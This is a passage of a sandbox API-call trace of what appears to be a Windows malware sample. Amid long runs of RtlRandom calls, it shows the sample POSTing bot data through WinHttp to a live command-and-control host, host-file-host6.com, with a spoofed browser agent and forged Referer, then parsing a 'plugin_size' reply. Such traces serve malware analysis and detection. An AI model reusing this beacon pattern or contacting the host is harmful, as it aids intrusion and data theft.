0xd0930f50 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5a636f7f [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x694e545f [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdc3e036a [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x61a27a2f [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2b91ecac [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x429a05f7 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x532edd2e [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf49da2b [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x58ab89ae [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x39cf4578 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xeb7e5ce2 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcf3ea7c4 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf0e0c648 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf578b4ad [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9bfe337a [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xce380a61 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf921fa4f [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf43e211f [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfd06c5a8 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x65c992cb [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x81256aa3 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb5b0cb2a [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4f34840a [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4cec2b55 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2f9802c2 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf151c27e [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3806596c [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xeb761451 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2624e2b7 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd04890bd [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc7a8e4fe [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6e6495f6 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x27ca29a9 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa6339541 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdb3c08c7 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x62d70e4d [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xbb0ff9d5 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8e5700be [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5a68e818 [0137.536] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5bf1fe1c [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6266f756 [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x992c8695 [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xaa187256 [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x80aea921 [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdbc319d4 [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa1df8b54 [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9939822a [0137.537] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3bc76f1f [0137.538] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa7127d39 [0137.538] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9907062e [0137.538] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8aab5e95 [0137.538] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x53550b45 [0137.538] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf08ebee5 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x54d60bd [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc8ca12c4 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd76cd48a [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8ded721b [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xadcea88d [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfa86e367 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe7491b90 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdd916d86 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x815658c0 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc54b9362 [0137.539] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xde6c1233 [0137.539] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0xb0) returned 0x80018e0 [0137.539] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0137.539] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0137.539] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0137.539] lstrcatA (in: lpString1="", lpString2=":>IUBc.5t[OWs9q'*SyNhqZ!dP1tw(c4!Qa#MLif,vWrl_3&qi%p`juS@JTzp/]/elCH'7UXd#xVrFO[fLHI9]7H" | out: lpString1=":>IUBc.5t[OWs9q'*SyNhqZ!dP1tw(c4!Qa#MLif,vWrl_3&qi%p`juS@JTzp/]/elCH'7UXd#xVrFO[fLHI9]7H") returned=":>IUBc.5t[OWs9q'*SyNhqZ!dP1tw(c4!Qa#MLif,vWrl_3&qi%p`juS@JTzp/]/elCH'7UXd#xVrFO[fLHI9]7H" [0137.539] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10c) returned 0x80019a0 [0137.539] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0137.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8001840, cbMultiByte=28, lpWideCharStr=0x80019a0, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0137.539] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfeefc18 | out: pProxyConfig=0xfeefc18) returned 1 [0137.691] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa332240 [0137.882] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfeefcd0 | out: lpUrlComponents=0xfeefcd0) returned 1 [0137.883] WinHttpConnect (hSession=0xa332240, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa092270 [0137.883] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001ac0 [0137.883] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x68) returned 0x8001ae0 [0137.883] WinHttpOpenRequest (hConnect=0xa092270, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa461cd0 [0137.884] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x4e) returned 0x8001b50 [0137.884] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10d) returned 0x8001bb0 [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2db4fe8b [0137.884] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001cd0 [0137.884] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x17) returned 0x8001cf0 [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x75204369 [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1969c335 [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6118d4bc [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa488e21a [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x99ee0ecd [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x43595c0f [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6bb9fd1c [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9fc5e832 [0137.884] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc5eb69a2 [0137.884] wsprintfW (in: param_1=0x8001bb0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://dbcfssde.com/") returned 42 [0137.885] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001cf0) returned 0x17 [0137.885] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cf0) returned 1 [0137.885] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001cd0) returned 0x12 [0137.885] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cd0) returned 1 [0137.885] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001b50) returned 0x4e [0137.885] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001b50) returned 1 [0137.885] WinHttpAddRequestHeaders (hRequest=0xa461cd0, pwszHeaders="Accept: */*\r\nReferer: http://dbcfssde.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0137.885] WinHttpSendRequest (hRequest=0xa461cd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x80018e0*, dwOptionalLength=0xa7, dwTotalLength=0xa7, dwContext=0x0) returned 1 [0139.178] WinHttpReceiveResponse (hRequest=0xa461cd0, lpReserved=0x0) returned 1 [0139.179] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x2800) returned 0x8001cd0 [0139.180] WinHttpReadData (in: hRequest=0xa461cd0, lpBuffer=0x8001cd0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001cd0*, lpdwNumberOfBytesRead=0xfeefd88*=0x18) returned 1 [0139.187] RtlReAllocateHeap (Heap=0x8000000, Flags=0x8, Ptr=0x8001cd0, Size=0x5000) returned 0x80044e0 [0139.188] WinHttpReadData (in: hRequest=0xa461cd0, lpBuffer=0x80044f8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x80044f8*, lpdwNumberOfBytesRead=0xfeefd88*=0x0) returned 1 [0139.188] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0139.190] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80044e0) returned 1 [0139.190] WinHttpCloseHandle (hInternet=0xa461cd0) returned 1 [0139.190] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001bb0) returned 0x10d [0139.190] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001bb0) returned 1 [0139.190] WinHttpCloseHandle (hInternet=0xa092270) returned 1 [0139.191] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001ae0) returned 0x68 [0139.191] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001ae0) returned 1 [0139.191] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001ac0) returned 0x12 [0139.191] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001ac0) returned 1 [0139.191] WinHttpCloseHandle (hInternet=0xa332240) returned 1 [0139.191] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x80019a0) returned 0x10c [0139.191] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80019a0) returned 1 [0139.191] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001870) returned 0x61 [0139.192] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001870) returned 1 [0139.192] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x80018e0) returned 0xb0 [0139.192] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80018e0) returned 1 [0139.192] lstrlenA (lpString="ä\x071|:|plugin_size=0") returned 19 [0139.192] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x15) returned 0x8001870 [0139.192] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0139.192] lstrlenA (lpString="plugin_size") returned 11 [0139.192] atoi (_Str="0") returned 0 [0139.192] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0139.192] lstrlenA (lpString="|:|") returned 3 [0139.193] MapViewOfFile (hFileMappingObject=0x2184, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8070000 [0139.221] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0139.221] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8070000) returned 0x0 [0139.268] atoi (_Str="1") returned 1 [0139.268] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8195a0b2 [0139.268] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0xce) returned 0x8001890 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfc433339 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcb36a0db [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1a02141e [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x312d4127 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb10e83e3 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf22661d2 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xffff7ef2 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x233611b0 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x59f13f3c [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe4c33a12 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xeee29b7d [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xead43a64 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x75bc966c [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcb6a2089 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc6d59d0c [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xda0c625f [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x80eb16f2 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb920986 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd32efc97 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x953543c [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf88c9d30 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc6229889 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6201e7b5 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdac14db [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x940d93c0 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x76e8df6 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1db85710 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5b0ca528 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x35fabeb4 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5979a331 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x81a5c7b5 [0139.269] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x12550d64 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4c6279e4 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb5a1a359 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x74b0bb52 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2762b151 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2e1b8c27 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x64062606 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x837d76ef [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf5a07dd4 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5735a6ac [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf42c6b9d [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf6d73e52 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe2033cdf [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7228d95d [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9db27d7c [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xff86e77 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1f9d3e4d [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x34ebae93 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4f92ddeb [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb14a6909 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb0f7c22c [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x18d6b6bc [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x867a899 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x66d92a37 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf67d8415 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x30ed7403 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x98d77c47 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xed222a6 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8725a159 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3871824e [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x98987ba8 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x37e77b6 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8e0c149e [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa43a0cf0 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x42fa7b50 [0139.270] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x699f1a45 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdc1da4ea [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd6cf8e9 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8cc0896c [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xbd25e9cb [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe8a1028 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x58a2e364 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa889245f [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc6d854c8 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x602af7a0 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1ececf32 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdbf9a73 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xeeb30741 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb3d26573 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x678de56d [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc735148d [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1b34b866 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7f4b746e [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1781adc6 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x80dce551 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb1233482 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8b53b7eb [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x56e07bd [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8490340c [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9d67b590 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf4626723 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2ac75d4 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb5d7d4fb [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xaada83d2 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x38352aa3 [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xabd4322c [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5eff00cd [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7aac0fea [0139.271] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x716f0d35 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcc7c98a8 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdf731521 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x30141a26 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8d4ee81b [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xeb55d90a [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9414558b [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x80eee6b9 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf4e6dc4f [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8551402f [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb04d1d7a [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd7621abf [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb080cf8 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9374ed09 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x34c58c9f [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd340c439 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2ca00a3c [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf3e36d67 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7fe2ad85 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6574a4ce [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcb18d4fb [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5ee952f1 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5762e0cd [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1ae2dd3d [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd55e8f5f [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x306aacf6 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf052f235 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe6761865 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc631f268 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x90883689 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8a20bea6 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x957f5df3 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xea741e9f [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe6ff9af3 [0139.272] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x36b3f4f7 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8144f4c6 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1a3d449d [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd43ec338 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x764f242c [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x13af5301 [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd786748f [0139.273] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe3d18bef [0139.273] 